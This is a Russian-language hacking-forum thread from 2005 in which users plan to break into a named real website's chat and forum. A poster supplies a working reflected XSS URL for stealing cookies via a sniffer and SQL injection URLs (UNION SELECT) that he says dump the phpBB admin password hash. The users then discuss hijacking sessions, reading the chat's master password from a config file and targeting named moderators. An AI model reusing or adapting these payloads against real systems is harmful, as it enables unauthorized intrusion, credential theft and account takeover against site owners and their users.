HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Чаты
Перезагрузить страницу Какие дыры у него есть?
   
 
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Какие дыры у него есть?
  #1  
Старый 25.12.2005, 21:09
Razial
Новичок
Регистрация: 25.12.2005
Сообщений: 12
С нами: 10724024

Репутация: 0
По умолчанию Какие дыры у него есть?
Чат http://www.nerungri.ru/cgi-bin/chat/chat.cgi
ничё не могу сделать, КАКИЕ ДЫРЫ У НЕГО?
𝕏 Twitter Reddit Telegram Копировать ссылку
 

  #2  
Старый 25.12.2005, 21:18
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
С нами: 11269766

Репутация: 345


По умолчанию
http://www.nerungri.ru/cgi-bin/chat/chart.cgi?action=send_pwd&name=<script>alert(/XXX/);</script>

подставь сниффер и закодируй в URL
 

  #3  
Старый 26.12.2005, 13:10
Razial
Новичок
Регистрация: 25.12.2005
Сообщений: 12
С нами: 10724024

Репутация: 0
По умолчанию
Поставил сниффер а как URL закодировать,
и ещё когда кидаю ссылку на снифер открывается новое окно ив нем загружаеться сниффер, поэтому в поле REFERRER нифига нет!
Последний раз редактировалось Razial; 26.12.2005 в 13:15..
 

  #4  
Старый 27.12.2005, 10:44
Razial
Новичок
Регистрация: 25.12.2005
Сообщений: 12
С нами: 10724024

Репутация: 0
По умолчанию
Вот если я подставляю снифер:
http://www.nerungri.ru/cgi-bin/chat/chart.cgi?action=send_pwd&name=<IMG src=адрес сниффера>

а дальше чё???

вот ещё
http://www.nerungri.ru/cgi-bin/chat/chart.cgi?action=userinfo&infoabout=<IMG%20src%3D дрес>
Последний раз редактировалось Razial; 27.12.2005 в 11:30..
 

  #5  
Старый 27.12.2005, 13:32
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
С нами: 11269766

Репутация: 345


По умолчанию
я поподробнее посмотрел, там куки красть бесполезно, нужна сессия
 

  #6  
Старый 27.12.2005, 15:58
Razial
Новичок
Регистрация: 25.12.2005
Сообщений: 12
С нами: 10724024

Репутация: 0
По умолчанию
И как узнать сессию?
Кстати там чтобы кикать, банить, короче для всего нужен мастерпароль который валяется по адресу
http://www.nerungri.ru/cgi-bin/chat/config.cgi
его оттуда никак не достать?
Последний раз редактировалось Razial; 27.12.2005 в 16:04..
 

  #7  
Старый 28.12.2005, 19:10
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
С нами: 11269766

Репутация: 345


По умолчанию
http://www.nerungri.ru/site/cnews/arhiv.shtml?Act=NewsList&Date=2004-05-06%27%20UNION%20SELECT+0,0,0,0,0,VERSION(),0,0,0,0/*

http://www.nerungri.ru/site/cnews/ar...%20user_id=2/*

вот это под форум, щас надо попросить кого-нито, чтоб привязали уязвимость к чату
 

  #8  
Старый 28.12.2005, 20:53
Razial
Новичок
Регистрация: 25.12.2005
Сообщений: 12
С нами: 10724024

Репутация: 0
По умолчанию
Это получчается он сессию выводит, только вот чью? и какое это имеет отношение к чату?
Последний раз редактировалось Razial; 28.12.2005 в 21:05..
 

  #9  
Старый 28.12.2005, 21:02
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
С нами: 11269766

Репутация: 345


По умолчанию
нет, сейчас он выводит хэш админа http://www.nerungri.ru/phpbb/ но иногда пароли совпадают..... ты знаешь вообще модеров там каких нибуть?
 

  #10  
Старый 28.12.2005, 21:07
Razial
Новичок
Регистрация: 25.12.2005
Сообщений: 12
С нами: 10724024

Репутация: 0
По умолчанию
Nikita, RaKoT, 1inch
 
 
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Есть ли дыры в форумах fastbb Kreps Уязвимости CMS / форумов 4 03.12.2005 00:05



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...